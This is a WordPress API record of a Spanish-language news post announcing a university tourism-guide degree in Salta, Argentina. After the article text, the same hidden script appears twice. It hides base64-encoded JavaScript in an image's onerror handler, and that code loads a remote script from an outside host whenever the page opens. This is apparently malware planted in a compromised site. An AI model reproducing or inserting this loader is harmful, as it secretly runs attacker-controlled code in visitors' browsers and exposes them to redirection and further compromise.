{"id":4399,"date":"2024-09-10T10:54:34","date_gmt":"2024-09-10T13:54:34","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4399"},"modified":"2025-08-13T23:48:52","modified_gmt":"2025-08-14T02:48:52","slug":"manana-se-presentara-la-tecnicatura-universitaria-en-guia-provincial-de-turismo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4399","title":{"rendered":"Ma\u00f1ana se presentar\u00e1 la Tecnicatura Universitaria en Gu\u00eda Provincial de Turismo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-5e2c7c8ab6bd95e5374f7a34aa34caaf\" style=\"background-color:#8e0550\"><em>El Ministerio de Turismo y Deportes y la UPATECO firmar\u00e1n ma\u00f1ana un convenio para lanzar la nueva Tecnicatura Universitaria en Gu\u00eda Provincial de Turismo. Los detalles se brindar\u00e1n a partir de las 10:30 en la Secretar\u00eda de Turismo, Buenos Aires 93.<\/em><\/h4>\n\n\n\n<p>La Tecnicatura Universitaria en Gu\u00eda Provincial de Turismo, destinada a gu\u00edas id\u00f3neos inscriptos en el Registro \u00danico de Gu\u00edas de Turismo de la Provincia, se presentar\u00e1 ma\u00f1ana a partir de las 10:30 en la sala de reuniones de la Secretar\u00eda de Turismo, Buenos Aires 93.<\/p>\n\n\n\n<p>En ese marco el Ministerio de Turismo y Deportes y la UPATECO firmar\u00e1n un convenio marco para llevar adelante esta nueva propuesta pedag\u00f3gica que se dictar\u00e1 de manera virtual y tendr\u00e1 una duraci\u00f3n de 4 meses.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><em><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/maniana-se-presentara-la-tecnicatura-universitaria-en-guia-provincial-de-turismo-97676\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Ministerio de Turismo y Deportes y la UPATECO firmar\u00e1n ma\u00f1ana un convenio para lanzar la nueva Tecnicatura Universitaria en Gu\u00eda Provincial de Turismo. Los detalles se brindar\u00e1n a partir de las 10:30 en la Secretar\u00eda de Turismo, Buenos Aires 93. La Tecnicatura Universitaria en Gu\u00eda Provincial de Turismo, destinada a gu\u00edas id\u00f3neos inscriptos en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4400,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,15],"tags":[],"class_list":{"0":"post-4399","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4399"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4399"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4399\/revisions"}],"predecessor-version":[{"id":6685,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4399\/revisions\/6685"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4400"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4399"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4399"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4399"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}